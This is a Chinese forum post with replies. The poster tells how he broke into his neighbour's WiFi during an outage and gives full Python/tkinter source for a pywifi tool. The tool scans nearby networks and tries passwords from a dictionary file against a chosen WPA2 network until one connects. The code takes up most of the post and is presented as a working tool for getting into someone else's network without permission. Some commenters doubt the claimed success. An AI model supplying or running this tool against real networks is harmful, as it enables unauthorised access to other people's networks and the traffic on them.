昨晚停网后,我写了一段代码,成功蹭上了隔壁的网...

楼主:
(转自小黄鸭编程社区)

昨晚,家里停网了,对于码农而言,停网了,这能忍?打电话给修网络的,说太晚了,要第二天才能过来...

突然发现隔壁妹纸的wifi信号满格哇,这让我动了邪念,看有没有办法蹭下网,首先,用的是万能钥匙,没有成功~~~

那我只能用字典来跑密码了哦,这种小功能,肯定只有交给python来完成了,搜了一下发现pywifi这个组件刚好满足需求。

那下面来记录一下我的操作过程。

# 简介

Python丰富的第三方库中自然也包括wifi的API,可以很方便的实现wifi的连接。如果有一份详细的密码本,可以实现wifi密码的暴力**,前提是你有足够的耐心和时间去等待。

# 思路

对给定的wifi名称,我们循环使用密码去一一做尝试,如果失败就断开连接,直到连接成功为止。

即导入所需要的第三方库(请自行下载安装好),通过 pywifi 调用网卡接口,依次做测试,循环读取密码尝试连接。在这里只需要修改密码文件路径和wifi名称即可。

# 环境准备

    python2.7

    pywifi模块

    字典

# 导入模块

from pywifi import *

# 字典准备

随机搞的wifi弱口令TOP10。一行只包含一组密码,脚本依次读取每行密码,直到找到正确的密码为止。

# 完整代码

# coding:utf-8

from tkinter import *
from tkinter import ttk
import pywifi
from pywifi import const
import time
import tkinter.filedialog
import tkinter.messagebox

class MY_GUI():
  def __init__(self,init_window_name):
    self.init_window_name = init_window_name

    #密码文件路径
    self.get_value = StringVar()

    #获取**wifi账号
    self.get_wifi_value = StringVar()

    #获取wifi密码
    self.get_wifimm_value = StringVar()

    self.wifi = pywifi.PyWiFi()  #抓取网卡接口
    self.iface = self.wifi.interfaces()[0] #抓取第一个无线网卡
    self.iface.disconnect()  #测试链接断开所有链接
    time.sleep(1)  #休眠1秒
    #测试网卡是否属于断开状态
    assert self.iface.status() in\
        [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]

  def __str__(self):
    return '(WIFI:%s,%s)' % (self.wifi,self.iface.name())

  #设置窗口
  def set_init_window(self):
    self.init_window_name.title("WIFI**工具")
    self.init_window_name.geometry('+500+200')

    labelframe = LabelFrame(width=400, height=200,text="配置")
    labelframe.grid(column=0, row=0, padx=10, pady=10)

    self.search = Button(labelframe,text="搜索附近WiFi",command=self.scans_wifi_list).grid(column=0,row=0)

    self.pojie = Button(labelframe,text="开始**",command=self.readPassWord).grid(column=1,row=0)

    self.label = Label(labelframe,text="目录路径:").grid(column=0,row=1)

    self.path = Entry(labelframe,width=12,textvariable = self.get_value).grid(column=1,row=1)

    self.file = Button(labelframe,text="添加密码文件目录",command=self.add_mm_file).grid(column=2,row=1)

    self.wifi_text = Label(labelframe,text="WiFi账号:").grid(column=0,row=2)

    self.wifi_input = Entry(labelframe,width=12,textvariable = self.get_wifi_value).grid(column=1,row=2)

    self.wifi_mm_text = Label(labelframe,text="WiFi密码:").grid(column=2,row=2)

    self.wifi_mm_input = Entry(labelframe,width=10,textvariable = self.get_wifimm_value).grid(column=3,row=2,sticky=W)

    self.wifi_labelframe = LabelFrame(text="wifi列表")
    self.wifi_labelframe.grid(column=0, row=3,columnspan=4,sticky=NSEW)

    # 定义树形结构与滚动条
    self.wifi_tree = ttk.Treeview(self.wifi_labelframe,show="headings",columns=("a", "b", "c", "d"))
    self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview)
    self.wifi_tree.configure(yscrollcommand=self.vbar.set)

    # 表格的标题
    self.wifi_tree.column("a", width=50, anchor="center")
    self.wifi_tree.column("b", width=100, anchor="center")
    self.wifi_tree.column("c", width=100, anchor="center")
    self.wifi_tree.column("d", width=100, anchor="center")

    self.wifi_tree.heading("a", text="WiFiID")
    self.wifi_tree.heading("b", text="SSID")
    self.wifi_tree.heading("c", text="BSSID")
    self.wifi_tree.heading("d", text="signal")

    self.wifi_tree.grid(row=4,column=0,sticky=NSEW)
    self.wifi_tree.bind("<Double-1>",self.onDBClick)
    self.vbar.grid(row=4,column=1,sticky=NS)

  #搜索wifi
  #cmd /k C:\Python27\python.exe "$(FULL_CURRENT_PATH)" & PAUSE & EXIT
  def scans_wifi_list(self):  # 扫描周围wifi列表
    #开始扫描
    print("^_^ 开始扫描附近wifi...")
    self.iface.scan()
    time.sleep(15)
    #在若干秒后获取扫描结果
    scanres = self.iface.scan_results()
    #统计附近被发现的热点数量
    nums = len(scanres)
    print("数量: %s"%(nums))
    #print ("| %s |  %s |  %s | %s"%("WIFIID","SSID","BSSID","signal"))
    # 实际数据
    self.show_scans_wifi_list(scanres)
    return scanres

  #显示wifi列表
  def show_scans_wifi_list(self,scans_res):
    for index,wifi_info in enumerate(scans_res):
            # print("%-*s| %s | %*s |%*s\n"%(20,index,wifi_info.ssid,wifi_info.bssid,,wifi_info.signal))
      self.wifi_tree.insert("",'end',values=(index + 1,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))
      #print("| %s | %s | %s | %s \n"%(index,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))

  #添加密码文件目录
  def add_mm_file(self):
    self.filename = tkinter.filedialog.askopenfilename()
    self.get_value.set(self.filename)

  #Treeview绑定事件
  def onDBClick(self,event):
    self.sels= event.widget.selection()
    self.get_wifi_value.set(self.wifi_tree.item(self.sels,"values")[1])
    #print("you clicked on",self.wifi_tree.item(self.sels,"values")[1])

  #读取密码字典,进行匹配
  def readPassWord(self):
    self.getFilePath = self.get_value.get()
    #print("文件路径:%s\n" %(self.getFilePath))
    self.get_wifissid = self.get_wifi_value.get()
    #print("ssid:%s\n" %(self.get_wifissid))
    self.pwdfilehander=open(self.getFilePath,"r",errors="ignore")
    while True:
        try:
          self.pwdStr =self.pwdfilehander.readline()
          #print("密码: %s " %(self.pwdStr))
          if not self.pwdStr:
            break
          self.bool1=self.connect(self.pwdStr,self.get_wifissid)
          #print("返回值:%s\n" %(self.bool1) )
          if self.bool1:
            # print("密码正确:"+pwdStr
            # res = "密码:%s 正确 \n"%self.pwdStr;
            self.res = "===正确===  wifi名:%s  匹配密码:%s "%(self.get_wifissid,self.pwdStr)
            self.get_wifimm_value.set(self.pwdStr)
            tkinter.messagebox.showinfo('提示', '**成功!!!')
            print(self.res)
            break
          else:
            # print("密码:"+self.pwdStr+"错误")
            self.res = "---错误--- wifi名:%s匹配密码:%s"%(self.get_wifissid,self.pwdStr)
            print(self.res)
          sleep(3)
        except:
          continue

  #对wifi和密码进行匹配
  def connect(self,pwd_Str,wifi_ssid):
    #创建wifi链接文件
    self.profile = pywifi.Profile()
    self.profile.ssid =wifi_ssid #wifi名称
    self.profile.auth = const.AUTH_ALG_OPEN  #网卡的开放
    self.profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法
    self.profile.cipher = const.CIPHER_TYPE_CCMP    #加密单元
    self.profile.key = pwd_Str #密码
    self.iface.remove_all_network_profiles() #删除所有的wifi文件
    self.tmp_profile = self.iface.add_network_profile(self.profile)#设定新的链接文件
    self.iface.connect(self.tmp_profile)#链接
    time.sleep(5)
    if self.iface.status() == const.IFACE_CONNECTED:  #判断是否连接上
      isOK=True
    else:
      isOK=False
    self.iface.disconnect() #断开
    time.sleep(1)
    #检查断开状态
    assert self.iface.status() in\
        [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
    return isOK

def gui_start():
  init_window = Tk()
  ui = MY_GUI(init_window)
  print(ui)
  ui.set_init_window()
  #ui.scans_wifi_list()

  init_window.mainloop()

gui_start()

# 结果

运行结果如下图所示,你按照图形界面的操作,便能开始跑起来了。
你get到了没?

网友A(2020-03-16):
这速度有意义?
还不如直接手机开热点

网友B:
我就想知道。。。你咋知道隔壁是个妹子?

楼主:
引用 网友B:
我就想知道。。。你咋知道隔壁是个妹子?

网友C:
我就想知道,真的是你这代码把wifi蹭了,还是蹭了妹子还给了密码?我用GPU跑字典,十几个小时都跑不出一个。你这个还是直接去尝试连接,这效率,蹭上了真可惜,应该先买彩票

网友D:
太强了吧这样子

网友E:
真的很牛,一晚上就搞定了。另外 WIFI的名字都很皮

网友F:
不是先各种万能钥匙试有没有人分享的嘛

网友G:
哎,只有被蹭的命
啥时候搞一下试试